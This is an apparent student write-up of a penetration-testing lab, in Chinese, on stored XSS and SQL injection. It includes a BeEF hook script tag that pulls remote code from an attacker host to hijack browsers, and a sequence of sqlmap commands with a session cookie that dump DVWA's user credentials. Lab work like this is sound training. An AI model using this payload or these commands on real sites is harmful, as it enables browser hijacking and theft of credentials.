网络渗透测试实验三

Aimerl0
• 阅读 1270

写在前面 实验终于开始有意思起来了,Attack!

网络渗透测试实验三:XSS 和 SQL 注入

实验目的

  • 了解什么是XSS

  • 了解XSS攻击实施,理解防御XSS攻击的方法

  • 了解SQL注入的基本原理

  • 掌握PHP脚本访问MySQL数据库的基本方法

  • 掌握程序设计中避免出现SQL注入漏洞的基本方法

  • 掌握网站配置。

系统环境

  • Kali Linux2、Windows Server

网络环境

  • 交换网络结构

实验工具

  • Beef
  • AWVS
  • Sqlmap
  • DVWA

实验步骤

XSS部分:利用 Beef 劫持被攻击者客户端浏览器

  • 实验环境搭建:

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。

搭建教程网站:本地win7系统下ASP网站环境搭建

搭建成功:

网络渗透测试实验三

  1. 利用 AWVS 扫描留言簿网站,发现存在 XSS 漏洞,截图

网络渗透测试实验三

这里还看到了一个 HTTP.sys远程代码执行漏洞,稍微看了一下,还是个二进制漏洞,metasploit已经收录而且能直接把受害主机打蓝屏,真不错

每日漏洞 | HTTP.sys远程代码执行

HTTP.sys远程代码执行漏洞

  1. kali 使用 Beef 生成恶意代码,截图

很遗憾,我的新版 kali 依旧是没有 beef ,果断选择安回所有工具

apt-get -y install kali-linux-default #渗透测试的基本工具 apt-get -y install kali-linux-large #更广泛的工具 apt-get -y install kali-linux-everything #所有工具

然后还是没有 beef

自己安装了一个apt-get install beef-xss

打开 beef 的时候遇到了一个报错,说不能使用默认的账号密码(beef beef),去对应路径下找到文件自己改一个新的账号密码就行了

[!] ERROR: Don't use default username and password!
[15:18:15]    |_  Change the beef.credentials.passwd in /etc/beef-xss/config.yaml

网络渗透测试实验三

  1. 访问 http://留言簿网站/message.asp,将以下恶意代码写入网站留言板,截图
<script src="http://192.168.17.132:3000/hook.js"></script>
  1. 管理员登录 login.html,账号密码均为 admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在 beff 中的配置截图

没有选择跳到学校主页,选择了跳到自己的博客主页

网络渗透测试实验三

网络渗透测试实验三

  1. 回答问题:实验中 XSS 攻击属于哪种类型?

存储型 XSS

SQL 注入部分:DVWA + SQLmap + Mysql 注入实战

  • 实验环境搭建。启动 Metasploitable2 虚拟机
  1. 在输入框输入1,返回

    ID: 1 First name: admin Surname: admin

    返回正常; 再次输入1',报错,返回

    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

    此时可以断定有SQL注入漏洞, http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit# 下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

  2. 枚举当前使用的数据库名称和用户名

网络渗透测试实验三

用 sqlmap 直接扫的时候遇到了个问题,存在 302 跳转页面,扫的时候会直接跳回 login.php 登录页面,所以需要加 cookie 来扫

退回登录页面,抓包拿到 cookie

security=low; PHPSESSID=f383161ec8314206ec01076f9b34b866

网络渗透测试实验三

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' -b --current-db --current-user

Sqlmap 输出截图:

网络渗透测试实验三

  1. 枚举数据库用户名和密码

网络渗透测试实验三

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' --users --password --batch

Sqlmap 输出截图

网络渗透测试实验三

  1. 枚举数据库

--dbs:枚举所有数据库

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' --dbs

Sqlmap 输出截图:

网络渗透测试实验三

  1. 枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' -D dvwa --tables

Sqlmap 输出截图:

网络渗透测试实验三

  1. 获取指定数据库和表中所有列的信息

-D 数据库名:指定的数据库

-T 指定数据表名:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' -D dvwa -T users --columns

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' -D dvwa -T guestbook --columns

Sqlmap 输出截图:

网络渗透测试实验三

网络渗透测试实验三

  1. 枚举指定数据表中的所有用户名和密码,并 down 到本地

-C 指定数据表中的列:枚举数据表中的列

--dump:存储数据表项

你输入的命令:

sqlmap -u "http://192.168.17.130/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low;PHPSESSID=f383161ec8314206ec01076f9b34b866' -D dvwa -T users -C user password --dump

Sqlmap 输出截图:

网络渗透测试实验三

查看 down 到本地的用户名和密码,截图。

网络渗透测试实验三

点赞
收藏
评论区
推荐文章
blmius blmius
1年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
Jacquelyn38 Jacquelyn38
2年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
helloworld_34035044 helloworld_34035044
11个月前
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
Stella981 Stella981
1年前
Python3:sqlalchemy对mysql数据库操作,非sql语句
Python3:sqlalchemy对mysql数据库操作,非sql语句python3authorlizmdatetime2018020110:00:00coding:utf8'''
Stella981 Stella981
1年前
KVM调整cpu和内存
一.修改kvm虚拟机的配置1、virsheditcentos7找到“memory”和“vcpu”标签,将<namecentos7</name<uuid2220a6d1a36a4fbb8523e078b3dfe795</uuid
Easter79 Easter79
1年前
Twitter的分布式自增ID算法snowflake (Java版)
概述分布式系统中,有一些需要使用全局唯一ID的场景,这种时候为了防止ID冲突可以使用36位的UUID,但是UUID有一些缺点,首先他相对比较长,另外UUID一般是无序的。有些时候我们希望能使用一种简单一些的ID,并且希望ID能够按照时间有序生成。而twitter的snowflake解决了这种需求,最初Twitter把存储系统从MySQL迁移
Wesley13 Wesley13
1年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
1年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
1年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Wesley13 Wesley13
1年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_